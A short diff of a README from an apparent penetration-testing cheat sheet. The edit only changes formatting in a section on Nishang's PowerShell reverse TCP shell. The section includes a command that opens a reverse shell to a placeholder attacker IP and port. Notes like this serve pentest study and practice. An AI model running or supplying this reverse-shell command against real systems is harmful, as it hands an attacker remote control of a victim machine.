e13olf/CheatSheet/README.md

 Windows Powershell
 ------------------
-Nishang -PS reverse tcp
+Nishang -PS reverse tcp.

-Copy the .Example to the bottom of the script
+Copy the **.Example** to the bottom of the script

       Invoke-PowershellTcp -Reverse -IPAddress x.x.x.x -Port 1234